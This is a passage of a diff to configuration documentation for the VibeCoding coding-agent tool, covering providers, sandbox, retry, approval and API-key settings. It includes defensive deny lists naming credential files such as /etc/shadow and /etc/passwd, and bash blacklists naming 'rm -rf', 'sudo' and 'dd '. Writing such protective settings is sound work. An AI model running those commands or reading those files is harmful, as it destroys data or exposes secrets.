           "name": "DeepSeek-V4-Flash",
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 0.5, "output": 2.0 }
         },
         {
           "id": "deepseek-v4-pro",
           "name": "DeepSeek-V4-Pro",
           "reasoning": true,
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 1, "output": 4 }
         }
       ]
     },
@@ -50,101 +56,265 @@ Project-level configuration overrides global configuration.
           "id": "deepseek-v4-flash",
           "name": "DeepSeek-V4-Flash",
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 0.5, "output": 2.0 }
         },
         {
           "id": "deepseek-v4-pro",
           "name": "DeepSeek-V4-Pro",
           "reasoning": true,
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 1, "output": 4 }
         }
       ]
-    },
-    "my-custom": {
-      "baseUrl": "https://my-api.example.com/v1",
-      "api": "openai-chat",
-      "models": []
     }
   },
   "defaultProvider": "deepseek-openai",
   "defaultModel": "deepseek-v4-flash",
   "defaultMode": "agent",
   "defaultThinkingLevel": "medium",
-  "maxOutputTokens": 384000,
+  "enablePlanTool": true,
   "maxContextTokens": 1000000,
+  "maxOutputTokens": 384000,
+  "contextFiles": {
+    "enabled": true,
+    "extraFiles": ["/path/to/extra-context.md"]
+  },
+  "skillsDir": "~/.vibecoding/skills",
   "compaction": {
     "enabled": true,
     "reserveTokens": 16384,
-    "keepRecentTokens": 20000
+    "keepRecentTokens": 20000,
+    "idleCompressionEnabled": false,
+    "idleTimeoutSeconds": 90,
+    "idleMinTokensForCompress": 150000
   },
   "sandbox": {
-    "enabled": true,
-    "level": "standard",
-    "allowNetwork": false
+    "enabled": false,
+    "level": "none",
+    "bwrapPath": "",
+    "allowNetwork": false,
+    "allowedRead": ["/usr", "/lib", "/lib64", "/bin", "/sbin"],
+    "allowedWrite": [],
+    "deniedPaths": ["/etc/shadow", "/root", "/home"],
+    "passEnv": ["PATH", "HOME", "USER", "LANG", "TERM", "SHELL"],
+    "tmpSize": "100m"
   },
-  "contextFiles": {
+  "sessionDir": "~/.vibecoding/sessions",
+  "shellPath": "/bin/bash",
+  "shellCommandPrefix": "",
+  "theme": "dark",
+  "retry": {
     "enabled": true,
-    "extraFiles": [
-      "/path/to/extra-context.md"
-    ]
+    "maxRetries": 3,
+    "baseDelayMs": 2000
   },
-  "skills": {
-    "enabled": true,
-    "dirs": [
-      "~/.vibecoding/skills",
-      ".skills"
-    ]
+  "approval": {
+    "bashWhitelist": ["go ", "make ", "git ", "npm ", "yarn ", "node ", "python ", "pip "],
+    "bashBlacklist": ["rm -rf", "sudo"],
+    "confirmBeforeWrite": true
   }
 }
 ```
 
+## All Configuration Fields
+
+### Top-Level Fields Reference
+
+| Field | Type | Default | Description |
+|-------|------|---------|-------------|
+| `providers` | object | *(see below)* | Provider configurations (keyed by name) |
+| `defaultProvider` | string | `"deepseek-openai"` | Which provider to use by default |
+| `defaultModel` | string | `"deepseek-v4-flash"` | Which model ID to use by default |
+| `defaultMode` | string | `"agent"` | Default run mode: `plan`, `agent`, or `yolo` |
+| `defaultThinkingLevel` | string | `"medium"` | Default thinking level |
+| `enablePlanTool` | bool | `true` | Register the built-in `plan` tool |
+| `maxContextTokens` | int | `0` (auto) | Override maximum context token count |
+| `maxOutputTokens` | int | `0` (auto) | Override maximum output token count |
+| `contextFiles` | object | *(see below)* | Context file loading settings |
+| `skillsDir` | string | `"~/.vibecoding/skills"` | Global skills directory path |
+| `compaction` | object | *(see below)* | Context compaction settings |
+| `sandbox` | object | *(see below)* | Sandbox execution settings |
+| `sessionDir` | string | `"~/.vibecoding/sessions"` | Session file storage directory |
+| `shellPath` | string | `""` (auto) | Custom shell path for Bash tool |
+| `shellCommandPrefix` | string | `""` | Prefix prepended to every shell command |
+| `theme` | string | `"dark"` | UI theme: `"dark"` or `"light"` |
+| `retry` | object | *(see below)* | API call retry settings |
+| `approval` | object | *(see below)* | Bash command approval settings |
+| `webSearch` | object | *(see below)* | Hosted web search settings |
+
+---
+
 ## Configuration Details
 
 ### providers
 
-Multi-provider configuration. Each provider contains:
+Multi-provider configuration. Each provider is an object keyed by a user-chosen name:
+
+| Field | Type | Required | Default | Description |
+|-------|------|----------|---------|-------------|
+| `baseUrl` | string | ✓ | — | API base URL |
+| `vendor` | string | — | auto-detect | Optional vendor adapter name (see below) |
+| `apiKey` | string | — | `""` | API key (see [Authentication](#authentication-configuration) below) |
+| `api` | string | — | auto-detect | API protocol: `"openai-chat"`, `"openai-responses"`, `"anthropic-messages"`, `"google-gemini"`, or `"google-vertex"` |
+| `httpProxy` | string | — | `""` | Optional per-provider HTTP proxy URL, e.g. `"http://127.0.0.1:7890"` |
+| `thinkingFormat` | string | — | auto-detect | Thinking parameter format (see below) |
+| `cacheControl` | bool | — | `false` | Enable Anthropic prompt caching; set `true` when using Claude models |
+| `models` | array | — | `[]` | List of available models |
+
+#### vendor field
+
+The `vendor` field selects a vendor adapter without changing the provider config schema. It is optional; when omitted, VibeCoding tries to detect the vendor from `baseUrl`, then falls back to the generic protocol provider selected by `api`.
+
+Selection order:
+
+1. Explicit `vendor`
+2. Base URL detection
+3. Generic fallback: `openai-chat`, `openai-responses`, `anthropic-messages`, `google-gemini`, or `google-vertex`
 
-| Field | Type | Required | Description |
-|-------|------|----------|-------------|
-| `baseUrl` | string | ✓ | API base URL |
-| `apiKey` | string | - | API key (optional, can also use environment variables) |
-| `api` | string | - | API type: `openai-chat` or `anthropic-messages` |
-| `thinkingFormat` | string | - | Thinking parameter format: `""`, `"openai"`, `"anthropic"`, `"xiaomi"` |
-| `models` | array | - | List of available models |
+Built-in vendor adapters include `openai`, `anthropic`, `claude`, `deepseek`, `google-gemini`, `google-vertex`, `xiaomi`, `xiaomi-token-plan-ams`, `xiaomi-token-plan-cn`, `xiaomi-token-plan-sgp`, `kimi`, `minimax`, `seed`, `qianfan`, `bailian`, `gitee`, `openrouter`, `together`, `groq`, and `fireworks`.
+
+```json
+{
+  "providers": {
+    "custom-deepseek": {
+      "vendor": "deepseek",
+      "baseUrl": "https://api.deepseek.com",
+      "apiKey": "${DEEPSEEK_API_KEY}",
+      "api": "openai-chat",
+      "models": [
+        { "id": "deepseek-v4-flash", "name": "DeepSeek-V4-Flash", "contextWindow": 1000000 }
+      ]
+    }
+  }
+}
+```
+
+### webSearch
+
+Hosted web search settings. This is disabled by default.
+
+| Field | Type | Required | Default | Description |
+|-------|------|----------|---------|-------------|
+| `enabled` | bool | — | `false` | Enable hosted web search registration |
+| `provider` | string | — | `defaultProvider` | Provider configuration name to use for hosted web search |
+| `providerType` | string | — | auto | Hosted tool type, usually `responses` or `messages` |
+| `model` | string | — | `""` | Optional metadata for routing, display, or future provider-specific handling |
+
+```json
+{
+  "webSearch": {
+    "enabled": true,
+    "provider": "gpt",
+    "providerType": "responses",
+    "model": "gpt-5.4"
+  }
+}
+```
+
+When `provider` points to a configured provider name, VibeCoding resolves that provider's `baseUrl`, `api`, and vendor behavior before registering the hosted search tool.
 
 #### api field
 
 The `api` field specifies the **protocol format**, not the service provider. You can point any provider to any compatible endpoint:
 
 - `openai-chat`: OpenAI Chat Completions API format
+- `openai-responses`: OpenAI Responses API format (`POST /v1/responses`)
 - `anthropic-messages`: Anthropic Messages API format
+- `google-gemini`: Native Gemini API `streamGenerateContent` format
+- `google-vertex`: Native Vertex AI Gemini `streamGenerateContent` format
 
 For example, DeepSeek offers both formats at different endpoints, and you can also use these formats to connect to the actual OpenAI or Anthropic services.
 
 If not specified, auto-detected based on `baseUrl`:
+- Contains `generativelanguage.googleapis.com` → `google-gemini`
+- Contains `aiplatform.googleapis.com` → `google-vertex`
 - Contains "anthropic" → `anthropic-messages`
 - Others → `openai-chat`
 
+Google native providers can be configured directly:
+
+```json
+{
+  "providers": {
+    "google-gemini": {
+      "baseUrl": "https://generativelanguage.googleapis.com/v1beta/models",
+      "apiKey": "${GOOGLE_API_KEY}",
+      "api": "google-gemini",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    },
+    "google-vertex": {
+      "baseUrl": "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models",
+      "apiKey": "!gcloud auth print-access-token",
+      "api": "google-vertex",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    }
+  }
+}
+```
+
+The `!gcloud auth print-access-token` example uses shell command resolution. Set `VIBECODING_ALLOW_SHELL_CONFIG=1` before using `!command` values, or replace it with an environment-variable reference such as `${GOOGLE_VERTEX_TOKEN}`.
+
 #### thinkingFormat field
 
 Specifies how thinking/reasoning parameters are sent to the API:
 
-- `""` (empty): Auto-detect based on URL
-- `"openai"`: Use OpenAI `reasoning_effort` format
-- `"anthropic"`: Use Anthropic `thinking` with `budget_tokens`
-- `"xiaomi"`: Use `thinking: {type: "enabled"}` format (for Xiaomi MiMo API)
+| Value | Behavior |
+|-------|----------|
+| `""` (empty) | Auto-detect based on URL |
+| `"openai"` | Use OpenAI `reasoning_effort` format |
+| `"anthropic"` | Use Anthropic `thinking` with `budget_tokens` |
+| `"deepseek"` | Use DeepSeek `thinking: {type: "enabled"}` + `reasoning_effort` (OpenAI) or `output_config.effort` (Anthropic) |
+| `"xiaomi"` | Legacy thinking-only format: `thinking: {type: "enabled"}` |
 
-When not set, automatically detects `xiaomi` format if URL contains `xiaomimimo`.
+When not set, automatically detects:
+- URL contains `deepseek` → `"deepseek"`
+- URL contains `xiaomimimo` → `"xiaomi"`
 
 ```json
 {
   "providers": {
-    "xiaomi": {
-      "baseUrl": "https://api.xiaomimimo.com/v1",
+    "deepseek-openai": {
+      "baseUrl": "https://api.deepseek.com",
       "apiKey": "sk-...",
       "api": "openai-chat",
-      "thinkingFormat": "xiaomi"
+      "thinkingFormat": "deepseek"
+    }
+  }
+}
+```
+
+#### cacheControl field
+
+Enable Anthropic-style prompt caching. When set to `true`, VibeCoding adds cache control headers to requests. **You should enable this when using Claude models through the Anthropic API** to reduce cost and latency.
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "baseUrl": "https://api.anthropic.com",
+      "apiKey": "${ANTHROPIC_API_KEY}",
+      "api": "anthropic-messages",
+      "cacheControl": true,
+      "models": [
+        {
+          "id": "claude-sonnet-4-20250514",
+          "name": "Claude Sonnet 4",
+          "contextWindow": 200000,
+          "maxTokens": 8192,
+          "cost": {
+            "input": 3,
+            "output": 15,
+            "cacheRead": 0.3,
+            "cacheWrite": 3.75
+          }
+        }
+      ]
     }
   }
 }
@@ -152,6 +322,46 @@ When not set, automatically detects `xiaomi` format if URL contains `xiaomimimo`
 
 #### models array
 
+Each model in the `models` array:
+
+| Field | Type | Default | Description |
+|-------|------|---------|-------------|
+| `id` | string | — | Model ID sent to the API |
+| `name` | string | — | Human-readable display name |
+| `reasoning` | bool | `false` | Whether the model supports thinking/reasoning |
+| `contextWindow` | int | `0` | Context window size (tokens) |
+| `maxTokens` | int | `0` | Maximum output tokens per response |
+| `input` | []string | `[]` | Supported input modalities: `"text"`, `"image"` |
+| `cost` | object | `null` | Pricing per million tokens |
+| `compat` | object | `null` | Model-specific compatibility flags for provider quirks |
+
+The `cost` object:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `input` | float | Cost per million input tokens |
+| `output` | float | Cost per million output tokens |
+| `cacheRead` | float | Cost per million cached read tokens (Anthropic) |
+| `cacheWrite` | float | Cost per million cached write tokens (Anthropic) |
+
+The `compat` object is optional and should only be set when a model needs protocol-specific adjustments:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `thinkingFormat` | string | Override model thinking format (`openai`, `deepseek`, `xiaomi`, `anthropic`, etc.) |
+| `requiresReasoningContentOnAssistant` | bool | Send empty `reasoning_content` on replayed assistant messages |
+| `requiresReasoningContentOnAssistantMessages` | bool | Alias used by the reference implementation; treated the same as above |
+| `forceAdaptiveThinking` | bool | Force Anthropic adaptive thinking format |
+| `supportsReasoningEffort` | bool | Whether the model accepts `reasoning_effort` |
+| `maxTokensField` | string | Use `max_tokens` or `max_completion_tokens` |
+| `supportsDeveloperRole` | bool | Whether developer-role messages are supported |
+| `supportsStore` | bool | Whether OpenAI `store` is supported |
+| `supportsStrictMode` | bool | Whether strict tool schemas are supported |
+| `supportsCacheControlOnTools` | bool | Whether cache control can be applied to tool definitions |
+| `supportsLongCacheRetention` | bool | Whether long prompt-cache retention is supported |
+| `sendSessionAffinityHeaders` | bool | Whether session affinity headers should be sent |
+| `supportsEagerToolInputStreaming` | bool | Whether Anthropic eager tool input streaming is supported |
+
 ```json
 {
   "id": "deepseek-v4-flash",
@@ -167,193 +377,596 @@ When not set, automatically detects `xiaomi` format if URL contains `xiaomimimo`
 }
 ```
 
-| Field | Type | Description |
-|-------|------|-------------|
-| `id` | string | Model ID |
-| `name` | string | Display name |
-| `contextWindow` | int | Context window size (tokens) |
-| `maxTokens` | int | Maximum output tokens |
-| `reasoning` | bool | Whether reasoning/thinking is supported |
-| `input` | []string | Supported input types (text, image) |
-| `cost` | object | Pricing (per million tokens) |
+---
 
 ### defaultProvider
 
-Default provider name. Corresponds to a key in `providers`.
+Default provider name. Must match a key in `providers`.
 
 ```json
-{
-  "defaultProvider": "deepseek-openai"
-}
+{ "defaultProvider": "deepseek-openai" }
 ```
 
 ### defaultModel
 
-Default model ID.
+Default model ID. Must match an `id` in the chosen provider's `models` list.
 
 ```json
-{
-  "defaultModel": "deepseek-v4-flash"
-}
+{ "defaultModel": "deepseek-v4-flash" }
 ```
 
 ### defaultMode
 
-Default run mode.
+Default run mode:
+
+| Value | Description |
+|-------|-------------|
+| `plan` | Read-only analysis mode — no file writes, sandboxed |
+| `agent` | Standard read/write mode (default) — Bash requires approval |
+| `yolo` | Full access mode — all tools auto-execute |
 
 ```json
-{
-  "defaultMode": "agent"
-}
+{ "defaultMode": "agent" }
 ```
 
-Options:
-- `plan`: Read-only analysis mode
-- `agent`: Standard read/write mode (default)
-- `yolo`: Full access mode
-
 ### defaultThinkingLevel
 
-Default thinking level.
+Default thinking level for reasoning models:
+
+| Value | Description |
+|-------|-------------|
+| `off` | Disable thinking |
+| `minimal` | Minimal thinking |
+| `low` | Low level |
+| `medium` | Medium level (default) |
+| `high` | High level |
+| `xhigh` | Highest level |
 
 ```json
-{
-  "defaultThinkingLevel": "medium"
-}
+{ "defaultThinkingLevel": "medium" }
 ```
 
-Options:
-- `off`: Disable thinking
-- `minimal`: Minimal thinking
-- `low`: Low level
-- `medium`: Medium level
-- `high`: High level
-- `xhigh`: Highest level
+### enablePlanTool
+
+Whether to register the built-in `plan` tool that allows the agent to create and track structured task plans.
+
+```json
+{ "enablePlanTool": true }
+```
+
+Set to `false` to disable it (e.g., if you prefer the agent not to use structured plans).
+
+### maxContextTokens
+
+Override the maximum context token count. When set to `0` (default), the value is derived from the model's `contextWindow`.
+
+```json
+{ "maxContextTokens": 200000 }
+```
 
 ### maxOutputTokens
 
-Maximum output token count.
+Override the maximum output token count. When set to `0` (default), the value is derived from the model's `maxTokens`.
 
 ```json
-{
-  "maxOutputTokens": 384000
-}
+{ "maxOutputTokens": 16384 }
 ```
 
-### maxContextTokens
+---
+
+### contextFiles
 
-Maximum context token count.
+Context file loading settings.
+
+| Field | Type | Default | Description |
+|-------|------|---------|-------------|
+| `enabled` | bool | `true` | Whether to automatically load context files |
+| `extraFiles` | []string | `[]` | Additional context file paths to load |
 
 ```json
 {
-  "maxContextTokens": 200000
+  "contextFiles": {
+    "enabled": true,
+    "extraFiles": [
+      "/path/to/extra-context.md",
+      "~/.vibecoding/global-context.md"
+    ]
+  }
 }
 ```
 
+#### Auto-loaded Context Files
+
+VibeCoding automatically searches for and loads the following files:
+
+1. **Global files** (in the global config directory):
+   - `AGENTS.md`
+   - `CLAUDE.md`
+
+2. **Project files** (searched upward from current directory):
+   - `AGENTS.md`
+   - `CLAUDE.md`
+   - `.vibe/AGENTS.md`
+   - `.vibe/CLAUDE.md`
+
+---
+
+### skillsDir
+
+Path to the global skills directory. Supports `~` expansion.
+
+| Platform | Default |
+|----------|---------|
+| Linux/macOS | `~/.vibecoding/skills` |
+| Windows | `%APPDATA%\vibecoding\skills` |
+
+```json
+{ "skillsDir": "~/.vibecoding/skills" }
+```
+
+Skills are loaded from:
+- **Global skills**: `<skillsDir>/<name>/SKILL.md`
+- **Project skills**: `.skills/<name>/SKILL.md` (override global)
+
+---
+
 ### compaction
 
-Context compression configuration for managing long conversations.
+Context compaction (compression) configuration for managing long conversations. When the context window fills up, VibeCoding can automatically summarize older messages to keep the conversation going.
+
+| Field | Type | Default | Description |
+|-------|------|---------|-------------|
+| `enabled` | bool | `true` | Enable automatic context compaction |
+| `reserveTokens` | int | `16384` | Tokens reserved for the model's response |
+| `keepRecentTokens` | int | `20000` | Recent message tokens to keep uncompacted |
+| `idleCompressionEnabled` | bool | `false` | Enable proactive compression during idle periods |
+| `idleTimeoutSeconds` | int | `90` | Seconds of user inactivity before idle compression triggers |
+| `idleMinTokensForCompress` | int | `150000` | Minimum context tokens before idle compression is worthwhile |
 
 ```json
 {
   "compaction": {
     "enabled": true,
     "reserveTokens": 16384,
-    "keepRecentTokens": 20000
+    "keepRecentTokens": 20000,
+    "idleCompressionEnabled": true,
+    "idleTimeoutSeconds": 90,
+    "idleMinTokensForCompress": 150000
   }
 }
 ```
 
-| Field | Type | Default | Description |
-|-------|------|---------|-------------|
-| `enabled` | bool | true | Whether to enable compression |
-| `reserveTokens` | int | 16384 | Tokens reserved for model response |
-| `keepRecentTokens` | int | 20000 | Tokens kept for recent messages |
+#### Idle Compression
+
+When enabled, VibeCoding proactively compresses the context during periods of inactivity (e.g., while you're reading output or thinking about your next prompt). This reduces latency for your next request because the context is already smaller.
+
+- **`idleCompressionEnabled`**: Off by default. Turn it on if you frequently have long conversations.
+- **`idleTimeoutSeconds`**: How long VibeCoding waits after the last interaction before triggering idle compression. Default: 90 seconds.
+- **`idleMinTokensForCompress`**: Idle compression only triggers if the current context exceeds this threshold. Default: 150,000 tokens.
+
+---
 
 ### sandbox
 
-Sandbox configuration.
+Sandbox configuration for secure command execution. Uses [bubblewrap (bwrap)](https://github.com/containers/bubblewrap) on Linux.
+
+| Field | Type | Default | Description |
+|-------|------|---------|-------------|
+| `enabled` | bool | `false` | Enable sandboxed execution |
+| `level` | string | `"none"` | Sandbox level: `"none"`, `"standard"`, `"strict"` |
+| `bwrapPath` | string | `""` (auto) | Custom path to the `bwrap` binary |
+| `allowNetwork` | bool | `false` | Allow network access inside sandbox |
+| `allowedRead` | []string | *(platform-specific)* | Paths readable inside the sandbox |
+| `allowedWrite` | []string | `[]` | Additional paths writable inside the sandbox |
+| `deniedPaths` | []string | *(platform-specific)* | Paths explicitly denied inside the sandbox |
+| `passEnv` | []string | *(platform-specific)* | Environment variables passed into the sandbox |
+| `tmpSize` | string | `"100m"` | Size limit for the sandbox's `/tmp` tmpfs mount |
 
 ```json
 {
   "sandbox": {
     "enabled": true,
     "level": "standard",
-    "allowNetwork": false
+    "bwrapPath": "/usr/bin/bwrap",
+    "allowNetwork": false,
+    "allowedRead": ["/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc/ssl"],
+    "allowedWrite": ["/tmp/my-build"],
+    "deniedPaths": ["/etc/shadow", "/root"],
+    "passEnv": ["PATH", "HOME", "USER", "LANG", "TERM", "SHELL", "GOPATH"],
+    "tmpSize": "200m"
   }
 }
 ```
 
+#### Sandbox Levels
+
+| Level | File System | Network | Use Case |
+|-------|------------|---------|----------|
+| `none` | Full access | ✓ | No sandboxing (YOLO mode default) |
+| `standard` | Project read-write | ✗ | Everyday development (Agent mode) |
+| `strict` | Project read-only | ✗ | Code review / analysis (Plan mode) |
+
+#### Platform Defaults for allowedRead
+
+**Linux:**
+```json
+["/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc/ld.so.cache", "/etc/ssl", "/etc/ca-certificates", "/dev/null", "/dev/urandom", "/dev/zero", "/proc/self", "/proc/meminfo", "/proc/cpuinfo"]
+```
+
+**macOS:**
+```json
+["/usr", "/lib", "/bin", "/sbin", "/System", "/Library"]
+```
+
+**Windows:**
+```json
+["C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)"]
+```
+
+#### Platform Defaults for deniedPaths
+
+**Linux / macOS:**
+```json
+["/etc/shadow", "/etc/gshadow", "/etc/passwd", "/root", "/home"]
+```
+
+**Windows:**
+```json
+["C:\\Users\\<Username>\\Documents", "C:\\Users\\<Username>\\Desktop"]
+```
+
+#### Platform Defaults for passEnv
+
+**All platforms:** `PATH`, `HOME`, `USER`, `LANG`, `LC_ALL`, `TERM`
+
+**Linux additionally:** `SHELL`, `GOPATH`, `GOROOT`, `GOPROXY`, `GOMODCACHE`, `NODE_PATH`
+
+**macOS additionally:** `SHELL`, `TMPDIR`
+
+**Windows additionally:** `APPDATA`, `LOCALAPPDATA`, `COMPUTERNAME`, `USERPROFILE`, `SYSTEMROOT`
+
+---
+
+### sessionDir
+
+Directory for storing session files (JSONL format). Supports `~` expansion.
+
+| Platform | Default |
+|----------|---------|
+| Linux/macOS | `~/.vibecoding/sessions` |
+| Windows | `%APPDATA%\vibecoding\sessions` |
+
+```json
+{ "sessionDir": "~/.vibecoding/sessions" }
+```
+
+---
+
+### shellPath
+
+Custom shell path for the Bash tool. When empty (default), VibeCoding uses the platform default:
+
+| Platform | Default |
+|----------|---------|
+| Linux | `$SHELL` or `/bin/bash` |
+| macOS | `$SHELL` or `/bin/zsh` |
+| Windows | `powershell.exe` or `cmd.exe` |
+
+```json
+{ "shellPath": "/usr/bin/fish" }
+```
+
+### shellCommandPrefix
+
+A string prepended to every shell command before execution. Useful for setting up environment or activating virtualenvs.
+
+```json
+{ "shellCommandPrefix": "source ~/.venv/bin/activate && " }
+```
+
+When empty (default), commands are executed directly.
+
+---
+
+### theme
+
+UI color theme for the terminal interface.
+
+| Value | Description |
+|-------|-------------|
+| `"dark"` | Dark background theme (default) |
+| `"light"` | Light background theme |
+
+```json
+{ "theme": "dark" }
+```
+
+---
+
+### retry
+
+API call retry configuration with exponential backoff. Retries apply to the initial HTTP connection phase only (once SSE streaming begins, it is not retried).
+
 | Field | Type | Default | Description |
 |-------|------|---------|-------------|
-| `enabled` | bool | false | Whether to enable sandbox |
-| `level` | string | standard | Sandbox level (none, standard, strict) |
-| `allowNetwork` | bool | false | Whether to allow network access |
+| `enabled` | bool | `true` | Enable automatic retries on transient API errors |
+| `maxRetries` | int | `3` | Maximum number of retry attempts |
+| `baseDelayMs` | int | `2000` | Base delay in milliseconds (doubles on each retry) |
 
-### contextFiles
+```json
+{
+  "retry": {
+    "enabled": true,
+    "maxRetries": 3,
+    "baseDelayMs": 2000
+  }
+}
+```
 
-Context file configuration.
+#### Retryable Errors
+
+The following errors trigger automatic retries:
+
+| Category | Examples |
+|----------|----------|
+| Rate limiting | HTTP 429 |
+| Server errors | HTTP 502, 503, 504 |
+| Network errors | connection refused, connection reset, DNS errors |
+| Timeouts | HTTP client timeout, TCP timeout |
+
+The following are **not** retried:
+- Context cancellation (user pressed Ctrl+C)
+- HTTP 4xx client errors (except 429): 400, 401, 403, 404
+- Successful connections that fail mid-stream
+
+#### Backoff Strategy
+
+Each retry waits `baseDelayMs × 2^attempt` milliseconds, capped at 30 seconds:
+
+| Attempt | Delay (base=2000ms) |
+|---------|--------------------|
+| 1st | 2s |
+| 2nd | 4s |
+| 3rd | 8s |
+
+When a retry occurs, VibeCoding displays a status message in the TUI:
+```
+Retrying (1/3): request timed out — waiting 2.0s...
+Retrying (2/3): rate limited (HTTP 429) — waiting 4.0s...
+```
+
+#### Disabling Retries
 
 ```json
 {
-  "contextFiles": {
-    "enabled": true,
-    "extraFiles": [
-      "/path/to/extra-context.md",
-      "~/.vibecoding/global-context.md"
-    ]
+  "retry": {
+    "enabled": false
   }
 }
 ```
 
+---
+
+### approval
+
+Agent mode approval configuration. Controls which Bash commands auto-execute and which require user confirmation.
+
 | Field | Type | Default | Description |
 |-------|------|---------|-------------|
-| `enabled` | bool | true | Whether to automatically load context files |
-| `extraFiles` | []string | [] | Extra context file paths |
+| `bashWhitelist` | []string | *(see below)* | Command prefixes that auto-approve in agent mode |
+| `bashBlacklist` | []string | `[]` | Command prefixes that **always** require approval |
+| `confirmBeforeWrite` | bool | `true` | Require user approval before `Write`/`Edit` tools run in agent mode |
 
-#### Auto-loaded Context Files
+#### Default Whitelist
 
-VibeCoding automatically searches for and loads the following files:
+```json
+["go ", "make ", "git ", "npm ", "yarn ", "node ", "python ", "pip "]
+```
 
-1. **Global files** (Linux/macOS: `~/.vibecoding/`, Windows: `%APPDATA%\vibecoding\`):
-   - `AGENTS.md`
-   - `CLAUDE.md`
+#### Approval Flow
 
-2. **Project files** (searched upward from current directory):
-   - `AGENTS.md`
-   - `CLAUDE.md`
-   - `.vibe/AGENTS.md`
-   - `.vibe/CLAUDE.md`
+```
+Agent requests tool execution
+│
+▼
+Check mode
+├─ Plan mode → Deny (read-only)
+├─ Agent mode → Continue checking
+└─ YOLO mode → Auto-approve unless blacklisted
+│
+▼
+Blacklist check (highest priority):
+├─ Command matches blacklist → Require user approval
+└─ Otherwise continue
+│
+▼
+In Agent mode:
+├─ Write/Edit tool + confirmBeforeWrite=true → Require user approval
+├─ Non-Bash tool → Auto-approve
+├─ Command matches whitelist → Auto-approve
+└─ Otherwise → Require user approval
+│
+▼
+In --print mode:
+  Commands that would need approval → Fail immediately
+```
 
-### skills
+#### Example Configurations
 
-Skill system configuration.
+**Only allow git and npm:**
+```json
+{
+  "approval": {
+    "bashWhitelist": ["git ", "npm "]
+  }
+}
+```
 
+**Custom blacklist:**
 ```json
 {
-  "skills": {
-    "enabled": true,
-    "dirs": [
-      "~/.vibecoding/skills",
-      ".skills"
-    ]
+  "approval": {
+    "bashWhitelist": ["go ", "make ", "git "],
+    "bashBlacklist": ["rm -rf", "sudo", "dd "]
   }
 }
 ```
 
-The `"~/.vibecoding/skills"` path uses `~` expansion which works on Linux/macOS. On Windows, use `%APPDATA%\vibecoding\skills` or an absolute path.
+**Disable write confirmation (trust the agent):**
+```json
+{
+  "approval": {
+    "confirmBeforeWrite": false
+  }
+}
+```
+
+---
+
+## MCP Configuration
+
+MCP servers are configured in standalone `mcp.json` files, not in `settings.json`.
+
+VibeCoding loads MCP configuration at startup from:
+
+1. Global config: `~/.vibecoding/mcp.json` on Linux/macOS, or `%APPDATA%\vibecoding\mcp.json` on Windows
+2. Project config: `.vibe/mcp.json`
+
+Create a template from the TUI:
+
+```text
+/init_mcp project full
+/init_mcp global basic
+/mcps
+```
+
+Example:
+
+```json
+{
+  "mcpServers": [
+    {
+      "name": "local-tools",
+      "type": "stdio",
+      "command": "/absolute/path/to/mcp-server",
+      "args": ["--port", "8080"],
+      "env": [
+        {"name": "API_KEY", "value": "sk-..."}
+      ]
+    },
+    {
+      "name": "remote-tools",
+      "type": "http",
+      "url": "https://mcp.example.com",
+      "headers": [
+        {"name": "Authorization", "value": "Bearer token"}
+      ]
+    }
+  ]
+}
+```
+
+Supported transports:
+
+- `stdio`: requires an absolute `command` path
+- `http`: streamable HTTP endpoint via `url`
+- `sse`: legacy SSE stream via `url` plus `messageUrl`
+
+MCP tools are registered after built-in tools and `skill_ref`, but before the agent is created. The agent freezes its system prompt and tool definitions for the session, so changes to `mcp.json` require restarting the client.
+
+Tool names use `mcp_<server_name>_<tool_name>`. If a name already exists, VibeCoding appends a numeric suffix instead of replacing an existing tool. Starter-template placeholders such as `/absolute/path/to/mcp-server`, `example.com`, and `replace-me` are ignored during automatic startup loading.
+
+---
 
 ## Authentication Configuration
 
-### Option 1: Environment Variables
+VibeCoding supports multiple ways to provide API keys, with flexible resolution logic.
+
+### Key Resolution Order
+
+When VibeCoding needs the API key for a provider, it checks in this order:
+
+1. **Provider `apiKey` field** in `settings.json` — if set, resolved using the rules below
+2. **Derived environment variable** — provider name is converted to an env var: e.g., `deepseek-openai` → `DEEPSEEK_OPENAI_API_KEY`
+
+### apiKey Field Formats
+
+The `apiKey` field in a provider config supports three formats:
+
+| Format | Example | Behavior |
+|--------|---------|----------|
+| `${VAR}` | `"${DEEPSEEK_API_KEY}"` | Reads the value of environment variable `VAR` |
+| `!command` | `"!pass show deepseek-key"` | Executes a shell command and uses its stdout only when `VIBECODING_ALLOW_SHELL_CONFIG=1` |
+| Plain string | `"sk-abc123..."` | Used as-is (⚠️ not recommended for shared configs) |
+
+#### Environment Variable Reference
+
+```json
+{
+  "providers": {
+    "deepseek-openai": {
+      "apiKey": "${DEEPSEEK_API_KEY}"
+    }
+  }
+}
+```
+
+Then set the environment variable:
+
+```bash
+export DEEPSEEK_API_KEY=sk-...
+```
+
+#### Shell Command (Password Manager Integration)
+
+Prefix with `!` to run a shell command. VibeCoding uses `sh -c` on Linux/macOS and `powershell.exe` on Windows.
+
+Shell command resolution is disabled by default. To enable it for trusted local configuration, set:
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "apiKey": "!pass show api/anthropic"
+    },
+    "openai": {
+      "apiKey": "!security find-generic-password -s openai-api -w"
+    }
+  }
+}
+```
+
+This is useful for integrating with password managers like `pass`, `1password-cli`, macOS Keychain, or any other secret store.
+
+#### Derived Environment Variable Fallback
+
+If no `apiKey` is configured for a provider, VibeCoding derives an environment variable name from the provider name:
+
+| Provider Name | Derived Env Var |
+|---------------|-----------------|
